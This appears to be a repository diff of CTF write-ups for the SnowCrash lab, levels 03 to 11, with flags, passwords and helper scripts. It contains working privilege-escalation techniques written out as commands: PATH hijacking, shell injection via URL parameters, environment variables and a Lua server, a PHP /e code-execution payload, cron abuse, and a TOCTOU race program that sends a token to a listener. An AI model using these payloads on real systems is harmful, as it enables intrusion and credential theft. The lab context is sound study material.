We already knew all the useful information here, but at least we have a proof that it is an "normal" executable (ELF is what linux uses for binaries), it is indeed setuid (and setgid). No stripped means that we have a minimum of debug info (like symbol names)
What to do ? Lets bring out the big gun and start fully RE the binary.
How ? Using Ghidra. Ghidra is an NSA program made to take a binary, and look at it very closely. It can try to produce C-looking code that matches the assembly, and allow you to rename variables, function and all
```c
int main(int argc,char **argv,char **envp)
{
__gid_t __rgid;
__uid_t __ruid;
int iVar1;
gid_t gid;
uid_t uid;
__rgid = getegid();
__ruid = geteuid();
setresgid(__rgid,__rgid,__rgid);
setresuid(__ruid,__ruid,__ruid);
iVar1 = system("/usr/bin/env echo Exploit me");
return iVar1;
}
```
Ghidra dissembled the main function, and it looks like this.
Here it is valid C code, but sometimes ghidra can't produce valid C code because the assembly is missing data, so we were lucky !
Looking at this, it seems that the program does a little UID dance (and GID too), but we kinda don't care.
It doesn't seems to be exploitable in itself (but we do have to note that this
actually makes the binary a privilege escalation vector!)
What is important is the `system("/usr/bin/env echo Exploit me")` line. This launch a new process.
Looking at the `system` function, it behave likes an shell command (as in it calls a shell behind the scene), so we can have fun
the `/usr/bin/env` is very powerfull, but what we will use is the fact that it tries to find
the command passed as an argument in the `PATH`
but WE own the PATH variable. Nothing prevents us from slipping a new directory in the `PATH`, and having an `echo` command in it
lets do that
```bash
level03@SnowCrash:~$ mkdir /tmp/path
level03@SnowCrash:~$ cat <<EOF >/tmp/path/echo
> #!/bin/sh
> echo "I'm in !"
> EOF
level03@SnowCrash:~$ chmod +x /tmp/path/echo
level03@SnowCrash:~$ PATH=/tmp/path:$PATH ./level03
I'm in !
```
We are indeed in
now we can do lots of stuff, and we can basically call getflag.
I want to be a bit sneaky, so lets make it call getflag directly
```bash
level03@SnowCrash:~$ mkdir /tmp/path
level03@SnowCrash:~$ ln -s $(which getflag) /tmp/path/echo
level03@SnowCrash:~$ PATH=/tmp/path:$PATH ./level03
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
```
We just made a symlink in our naughty directory to the getflag binary, so when the "echo" got launched, it was actually `getflag` !

1
maiboyer/level03/flag Normal file
View file

@ -0,0 +1 @@
qi0maab88jeaj46qoumi7maus

1
maiboyer/level03/passwd Normal file
View file

@ -0,0 +1 @@
kooda2puivaav1idi4f57q8iq

96
maiboyer/level04/README.md Normal file
View file

@ -0,0 +1,96 @@
# Level 04
## how to login
username: level04
password: qi0maab88jeaj46qoumi7maus
## Goal
run `getflag` as user `flag04`
## Actually doing something
```bash
level04@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl*
-r-x------ 1 level04 level04 675 Apr 3 2012 .profile*
```
Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl
```perl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
$y = $_[0];
print `echo $y 2>&1`;
}
x(param("x"));
```
This reeks of exploit
As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it
The issue is how it returns it...
It forward it to a shell string, and print the result.
This is as secure as having a litteral endpoint that takes a command and return the result.
Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo`
command we can run whatever we want
for example `getflag`
we want this
```perl
print `echo $y 2>&1`
```
to become
```perl
print `echo idk && getflag 2>&1`
```
We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag`
but if we do it dumbly, nothing happens
```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag'
idk
```
Why ?
Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it.
How ?
The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&`
lets replace it to get `idk%26%26getflag` and voila !
```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag'
GetExploited
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```
lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path
```bash
level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo'
idk
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```
Look mom, I recycle my stuff !

1
maiboyer/level04/flag Normal file
View file

@ -0,0 +1 @@
ne2searoevaevoem4ov4ar8ap

1
maiboyer/level04/passwd Normal file
View file

@ -0,0 +1 @@
qi0maab88jeaj46qoumi7maus

76
maiboyer/level05/README.md Normal file
View file

@ -0,0 +1,76 @@
# Level 05
## how to login
username: level05
password: ne2searoevaevoem4ov4ar8ap
## Goal
run `getflag` as user `flag05`
## Actually doing something
```bash
level05@snowcrash.local.maix.me's password:
You have new mail.
level05@SnowCrash:~$
```
This is weird, the only mail I have is my chain mail !
Jokes aside, looking at the files in the user's home, there is nothing other than the default ones.
This reeks of old program though. Nobody check mails directly when they login like this.
From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, lets check it
```bash
level05@SnowCrash:~$ ll /var/mail/level05
-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05
level05@SnowCrash:~$ cat /var/mail/level05
*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05
```
Oh wow, this looks like a nice cronjob
if we decipher the old text, we get something like this:
> Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05`
so `su -c "text"` means "please run `text` as X" and the `- flag05` means "use as `flag05` and not `root` as your user"
so this runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05`
lets read that script
```bash
level05@SnowCrash:~$ cat /usr/sbin/openarenaserver
#!/bin/sh
for i in /opt/openarenaserver/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
```
It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (cpu time) per process, and then remove that file
lets try to add a little script there (like say something that dumps the output of `getflag` to elsewhere?)
```bash
``level05@SnowCrash:~$ cat <<EOF >/tmp/getflag05
> #!/bin/sh
> getflag >/tmp/flag05
> chmod +r /tmp/flag05
> EOF
level05@SnowCrash:~$ chmod a+rx /tmp/getflag05
level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag
level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05
Check flag.Here is your token : viuaaale9huek52boumoomioc
```
And voila !
We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio)

1
maiboyer/level05/flag Normal file
View file

@ -0,0 +1 @@
viuaaale9huek52boumoomioc

1
maiboyer/level05/passwd Normal file
View file

@ -0,0 +1 @@
ne2searoevaevoem4ov4ar8ap

131
maiboyer/level06/README.md Normal file
View file

@ -0,0 +1,131 @@
# Level 06
## how to login
username: level06
password: viuaaale9huek52boumoomioc
## Goal
run `getflag` as user `flag06`
## Actually doing something
```bash
level06@SnowCrash:~$ ls -la
total 24
dr-xr-x---+ 1 level06 level06 140 Mar 5 2016 .
d--x--x--x 1 root users 340 Aug 30 2015 ..
-r-x------ 1 level06 level06 220 Apr 3 2012 .bash_logout
-r-x------ 1 level06 level06 3518 Aug 30 2015 .bashrc
-rwsr-x---+ 1 flag06 level06 7503 Aug 30 2015 level06
-rwxr-x--- 1 flag06 level06 356 Mar 5 2016 level06.php
-r-x------ 1 level06 level06 675 Apr 3 2012 .profile
```
A php file, and a setuid binary ? Seems fishy
lets look at the php file first
```php
#!/usr/bin/php
<?php
function y($m) { $m = preg_replace("/\./", " x ", $m); $m = preg_replace("/@/", " y", $m); return $m; }
function x($y, $z) { $a = file_get_contents($y); $a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a); $a = preg_replace("/\[/", "(", $a); $a = preg_replace("/\]/", ")", $a); return $a; }
$r = x($argv[1], $argv[2]); print $r;
?>
```
This doesnt look good...
lets try to run the setuid binary
```bash
level06@SnowCrash:~$ ./level06
PHP Warning: file_get_contents(): Filename cannot be empty in /home/user/level06/level06.php on line 4
level06@SnowCrash:~$ ./level06 /tmp/flag05
#!/bin/sh
getflag >/tmp/flag05-output 2>&1
chmod +w /tmp/flag05-output
```
Can we ... just read whatever file we want ?! There must be something
lets look a the php file a bit more
Here is it with a better formatting
```php
#!/usr/bin/php
<?php
function y($m) {
$m = preg_replace("/\./", " x ", $m);
$m = preg_replace("/@/", " y", $m);
return $m;
}
function x($y, $z) {
$a = file_get_contents($y);
$a = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $a);
$a = preg_replace("/\[/", "(", $a);
$a = preg_replace("/\]/", ")", $a);
return $a;
}
$r = x($argv[1], $argv[2]);
print $r;
?>
```
and here it is with better names
```php
#!/usr/bin/php
<?php
function y($res) {
$res = preg_replace("/\./", " x ", $res);
$res = preg_replace("/@/", " y", $res);
return $res;
}
function x($arg1, $unused) {
$res = file_get_contents($arg1);
$res = preg_replace("/(\[x (.*)\])/e", "y(\"\\2\")", $res);
$res = preg_replace("/\[/", "(", $res);
$res = preg_replace("/\]/", ")", $res);
return $res;
}
$r = x($argv[1], $argv[2]);
print $r;
?>
```
it looks like it replaces lots of stuff, but overhall doesnt do much things
until I researched what the `/e` meant in the line right after `file_get_contents`
so it turns out this is a deprecated (and then removed) feature of PHP that allows the regexes search and replace to run code for every match
meaning that this will match any `[x <STUFF HERE>]` and run the function `y("<STUFF HERE>")`
lets try some stuff then !
```bash
level06@SnowCrash:~$ echo "[x @.@@.] @@" >/tmp/06
level06@SnowCrash:~$ ./level06 /tmp/06
y x y y x @@
```
It indeed ran the function `y` on the stuff inside brackets but not the stuff outside
so after a bit of digging into php, this seems to work and give us the flag !
```bash
level06@SnowCrash:~$ echo '[x ${`getflag`}]' >/tmp/06 && ./level06 /tmp/06
PHP Notice: Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub
in /home/user/level06/level06.php(4) : regexp code on line 1
```
From what I understood: `${stuff}` is a way to reference a variable name using another expression (here the variable name will be whatever stuff evaluates to)
and ``stuff\`` runs the shell command `stuff`
meaning that we want to get a variable named after the result of getflag -> it doesnt exist -> php compains and print a warning :D

1
maiboyer/level06/flag Normal file
View file

@ -0,0 +1 @@
wiok45aaoguiboiki2tuin6ub

1
maiboyer/level06/passwd Normal file
View file

@ -0,0 +1 @@
viuaaale9huek52boumoomioc

99
maiboyer/level07/README.md Normal file
View file

@ -0,0 +1,99 @@
# Level 07
## how to login
username: level07
password: wiok45aaoguiboiki2tuin6ub
## Goal
run `getflag` as user `flag07`
## Actually doing something
```bash
level07@SnowCrash:~$ ll
total 24
dr-x------ 1 level07 level07 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level07 level07 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level07 level07 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag07 level07 8805 Mar 5 2016 level07*
-r-x------ 1 level07 level07 675 Apr 3 2012 .profile*
```
seems like reverse engineering to me
```bash
level07@SnowCrash:~$ ./level07
level07
```
seems to be fun at parties indeed
lets crack open ghidra
```c
int main(int argc,char **argv,char **envp)
{
char *pcVar1;
int iVar2;
char *buffer;
gid_t gid;
uid_t uid;
char *local_1c;
__gid_t local_18;
__uid_t local_14;
local_18 = getegid();
local_14 = geteuid();
setresgid(local_18,local_18,local_18);
setresuid(local_14,local_14,local_14);
local_1c = (char *)0x0;
pcVar1 = getenv("LOGNAME");
asprintf(&local_1c,"/bin/echo %s ",pcVar1);
iVar2 = system(local_1c);
return iVar2;
}
```
we have the classic setuid dance at the begining of the function, then a call to `getenv`+`asprintf`+`system`
I see a `system` so I know we are on track !
but lets go in order and clean up the code a bit
```c
int main(int argc,char **argv,char **envp)
{
char *env;
int ret;
char *str;
str = NULL;
env = getenv("LOGNAME");
asprintf(&str,"/bin/echo %s ",env);
ret = system(str);
return ret;
}
```
already way better
It looks like it does something like this:
- Get the Varaible `LOGNAME`
- Create a string that looks like `/bin/echo $LOGNAME` using asprintf
asprintf is a way to create an allocated string with the format a regular printf would output
- call system to execute the created string
To me this reeks of simple `&& getflag`, lets try it out !
```bash
level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
```

1
maiboyer/level07/flag Normal file
View file

@ -0,0 +1 @@
fiumuikeil55xe9cu4dood66h

1
maiboyer/level07/passwd Normal file
View file

@ -0,0 +1 @@
wiok45aaoguiboiki2tuin6ub

51
maiboyer/level08/README.md Normal file
View file

@ -0,0 +1,51 @@
# Level 08
## how to login
username: level08
password: fiumuikeil55xe9cu4dood66h
## Goal
run `getflag` as user `flag08`
## Actually doing something
```bash
level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc*
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08*
-r-x------ 1 level08 level08 675 Apr 3 2012 .profile*
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
```
intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there
lets run the binary and see what happens
```bash
level08@SnowCrash:~$ ./level08
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
```
It is a little bit smart, lets try to outsmart it by using symlinks
```bash
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean
```
the old tale of checking for filename, and not actual file !
we can now get the actual token with that password:
```bash
level08@SnowCrash:~$ su flag08 -c getflag
Password:
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
```

1
maiboyer/level08/flag Normal file
View file

@ -0,0 +1 @@
25749xKZ8L7DkSCwJkT9dyv6f

1
maiboyer/level08/passwd Normal file
View file

@ -0,0 +1 @@
fiumuikeil55xe9cu4dood66h

105
maiboyer/level09/README.md Normal file
View file

@ -0,0 +1,105 @@
# Level 09
## how to login
username: level09
password: 25749xKZ8L7DkSCwJkT9dyv6f
## Goal
run `getflag` as user `flag09`
## Actually doing something
```bash
level09@SnowCrash:~$ ll
total 24
dr-x------ 1 level09 level09 140 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level09 level09 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level09 level09 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag09 level09 7640 Mar 5 2016 level09*
-r-x------ 1 level09 level09 675 Apr 3 2012 .profile*
----r--r-- 1 flag09 level09 26 Mar 5 2016 token
```
seems we need to do the same as last level
lets have fun hehe
```bash
level09@SnowCrash:~$ ./level09
You need to provied only one arg.
level09@SnowCrash:~$ ./level09 AAA
ABC
level09@SnowCrash:~$ ./level09 AAAAAAAAA
ABCDEFGHI
```
What happens if I give it a REALLY LONG argument ?
```bash
level09@SnowCrash:~$ ./level09 $(python -c "print('A' * 1000)")
ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~<7E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~<7E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~<7E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~<7E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
```
Alright lets open this bad boy under Ghidra
Woops after reading the code, it seems that it specifically tells you to not reverse it.
Looking a the files a bit closer, we can actually read the token file...
```bash
level09@SnowCrash:~$ ll token
----r--r-- 1 flag09 level09 26 Mar 5 2016 token
level09@SnowCrash:~$ cat token
f4kmm6p|=pnDBDu{
```
trying to directly use this as the password doesnt work, but when looking at the output of the binary, it seems that the does weird stuff to the input, lets try to run it through.
```bash
level09@SnowCrash:~$ ./level09 `cat token`
f5mpq;vE{{TSW
level09@SnowCrash:~$ su -c getflag flag09
Password:
su: Authentication failure
```
Doesnt work.
Then lets try to reverse the effect of the binary ?
It looks like it does something like this:
> for every character in input
> output (character+idx) % 255
let do a script that does:
> for every character in input
> output (character-idx) % 255
we run it and we get
```bash
./levels/09/script.py <files/token
f3iji1ju5yuevaus41q1afiuq
```
lets try this one
```bash
level09@SnowCrash:~$ su -c getflag flag09
Password:
Check flag.Here is your token : s5cAJpM8ev6XHw998pRWG728z
```
Perfect !

1
maiboyer/level09/flag Normal file
View file

@ -0,0 +1 @@
s5cAJpM8ev6XHw998pRWG728z

1
maiboyer/level09/passwd Normal file
View file

@ -0,0 +1 @@
25749xKZ8L7DkSCwJkT9dyv6f

12
maiboyer/level09/ressources/script.py Executable file
View file

@ -0,0 +1,12 @@
#!/usr/bin/env python
import sys
buf = sys.stdin.buffer.read()
buf = buf.strip(b'\n')
for i, b in enumerate(buf):
b = b - i
if b < 0:
b = 255 + b
sys.stdout.buffer.write(b.to_bytes())
print()

318
maiboyer/level10/README.md Normal file
View file

@ -0,0 +1,318 @@
# Level 10
## how to login
username: level10
password: s5cAJpM8ev6XHw998pRWG728z
## Goal
run `getflag` as user `flag10`
## Actually doing something
```bash
level10@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level10 level10 140 Mar 6 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level10 level10 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level10 level10 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x+ 1 flag10 level10 10817 Mar 5 2016 level10*
-r-x------ 1 level10 level10 675 Apr 3 2012 .profile*
-rw------- 1 flag10 flag10 26 Mar 5 2016 token
```
not so lukcy this time, flag isn't readable...
lets run the executable and see what it does
```bash
level10@SnowCrash:~$ ./level10
./level10 file host
sends file to host if you have access to it
level10@SnowCrash:~$ ./level10 token 192.168.92.90
You don't have access to token
level10@SnowCrash:~$ ./level10 .profile 192.168.92.90
Connecting to 192.168.92.90:6969 .. Connected!
Sending file .. Damn. Unable to open file
```
this seems fishy, lets view it in ida this time...
```c
int main(int argc, const char **argv, const char **envp)
{
int *errno; // eax
char *errno_str; // eax
const char *file; // [esp+28h] [ebp-1028h]
const char *host; // [esp+2Ch] [ebp-1024h]
int socket; // [esp+30h] [ebp-1020h]
int fd; // [esp+34h] [ebp-101Ch]
ssize_t read_ret; // [esp+38h] [ebp-1018h]
_BYTE buf[4096]; // [esp+3Ch] [ebp-1014h] BYREF
struct sockaddr addr; // [esp+103Ch] [ebp-14h] BYREF
unsigned int v13; // [esp+104Ch] [ebp-4h]
v13 = __readgsdword(0x14u);
if ( argc <= 2 )
{
printf("%s file host\n\tsends file to host if you have access to it\n", *argv);
exit(1);
}
file = argv[1];
host = argv[2];
if ( access(file, 4) )
return printf("You don't have access to %s\n", file);
printf("Connecting to %s:6969 .. ", host);
fflush(stdout);
socket = ::socket(2, 1, 0);
*(_DWORD *)&addr.sa_data[6] = 0;
*(_DWORD *)&addr.sa_data[10] = 0;
addr.sa_family = 2;
*(_DWORD *)&addr.sa_data[2] = inet_addr(host);
*(_WORD *)addr.sa_data = htons(0x1B39u);
if ( connect(socket, &addr, 0x10u) == -1 )
{
printf("Unable to connect to host %s\n", host);
exit(1);
}
if ( write(socket, ".*( )*.\n", 8u) == -1 )
{
printf("Unable to write banner to host %s\n", host);
exit(1);
}
printf("Connected!\nSending file .. ");
fflush(stdout);
fd = open(file, 0);
if ( fd == -1 )
{
puts("Damn. Unable to open file");
exit(1);
}
read_ret = read(fd, buf, 0x1000u);
if ( read_ret == -1 )
{
errno = __errno_location();
errno_str = strerror(*errno);
printf("Unable to read from file: %s\n", errno_str);
exit(1);
}
write(socket, buf, read_ret);
return puts("wrote file!");
}
```
Seems pretty straight forward, lets to create a file and listen to it using socat on the host machine
```bash
# vm
level10@SnowCrash:~$ echo "file" >/tmp/file
level10@SnowCrash:~$ ./level10 /tmp/file 192.168.92.90
Connecting to 192.168.92.90:6969 .. Connected!
Sending file .. wrote file!
```
```bash
# host
socat TCP-LISTEN:6969,fork stdio
.*( )*.
file
```
we got the file !
now the issue is that we can't send the token file direcly because it seems there isnt the
litlle setuid dance we have come to expect...
lets try to use a symlink ?
```bash
level10@SnowCrash:~$ ln -s $(realpath token) /tmp/tok2
level10@SnowCrash:~$ ./level10 /tmp/tok2 192.168.92.90
You don't have access to /tmp/tok2
```
When looking at the code, we have a check for permission (`access`) THEN we open the file using `open`
What if we try really hard to make it so when the program check for the file permission using access, it is a file we have full permission, but when it opens the file, it is changed to be the token file (a symlink to it)
lets write a little code for that:
```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv) {
if (argc < 2) {
fprintf(stderr, "%s: <file> <target>\n", argv[0]);
return 1;
}
const char *file = argv[1];
const char *target = argv[2];
int fd = -1;
while (1) {
unlink(file);
fd = open(file, O_CREAT | O_RDWR | O_TRUNC, 0777);
close(fd);
unlink(file);
symlink(target, file);
}
}
```
copy this to the VM (in /tmp), compile it, and run it
```bash
# shell 1
level10@SnowCrash:~$ /tmp/toctou /tmp/tok2 $(realpath token)
```
in shell 2 run something like this:
```bash
level10@SnowCrash:~$ while true; do ./level10 /tmp/tok2 192.168.92.90; done
```
since the issue (Named TOCTOU for `Time of Check - Time of Use`) is by nature time sensitive, we run it as long as we need to, hoping for at least ONE single nice happy path :D
and on the host, we get this:
```bash
socat TCP-LISTEN:6969,fork stdio
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
woupa2yuojeeaaed06riuj63c
.*( )*.
.*( )*.
.*( )*.
.*( )*.
woupa2yuojeeaaed06riuj63c
.*( )*.
.*( )*.
.*( )*.
.*( )*.
woupa2yuojeeaaed06riuj63c
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
woupa2yuojeeaaed06riuj63c
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
.*( )*.
```
we get lots of empty files (the one we try to trick the permission check with), and few token :D
```bash
level10@SnowCrash:~$ su flag10 -c getflag
Password:
Check flag.Here is your token : feulo4b72j7edeahuete3no7c
```

1
maiboyer/level10/flag Normal file
View file

@ -0,0 +1 @@
feulo4b72j7edeahuete3no7c

1
maiboyer/level10/passwd Normal file
View file

@ -0,0 +1 @@
s5cAJpM8ev6XHw998pRWG728z

20
maiboyer/level10/ressources/toctou.c Normal file
View file

@ -0,0 +1,20 @@
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv) {
if (argc < 2) {
fprintf(stderr, "%s: <file> <target>\n", argv[0]);
return 1;
}
const char *file = argv[1];
const char *target = argv[2];
int fd = -1;
while (1) {
unlink(file);
fd = open(file, O_CREAT | O_RDWR | O_TRUNC, 0777);
close(fd);
unlink(file);
symlink(target, file);
}
}

86
maiboyer/level11/README.md Normal file
View file

@ -0,0 +1,86 @@
# Level 11
## how to login
username: level11
password: feulo4b72j7edeahuete3no7c
## Goal
run `getflag` as user `flag11`
## Actually doing something
```bash
level11@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level11 level11 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level11 level11 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level11 level11 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua*
-r-x------ 1 level11 level11 675 Apr 3 2012 .profile*
```
a setuid script ? something seems fishy, lets open it
```lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))
function hash(pass)
prog = io.popen("echo "..pass.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local l, err = client:receive()
if not err then
print("trying " .. l)
local h = hash(l)
if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
client:send("Erf nope..\n");
else
client:send("Gz you dumb*\n")
end
end
client:close()
end
```
it seems to be a server that ask for a password, check that the password is correct and does something ?
Lookit at the `hash` function, we do see a nice little shell injection oportunity, lets try something :D
we want to have something that write the getflag somewhere like we did before.
what about the same script:
```bash
level11@SnowCrash:~$ cat <<EOF >/tmp/gettok
#!/bin/sh
getflag >/tmp/flag
chmod 777 /tmp/flag
EOF
level11@SnowCrash:~$ chmod +x /tmp/gettok
level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151
Password: Erf nope..
level11@SnowCrash:~$ cat /tmp/flag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
```
and voila :D

1
maiboyer/level11/flag Normal file
View file

@ -0,0 +1 @@
fa6v5ateaw21peobuub8ipe6s

1
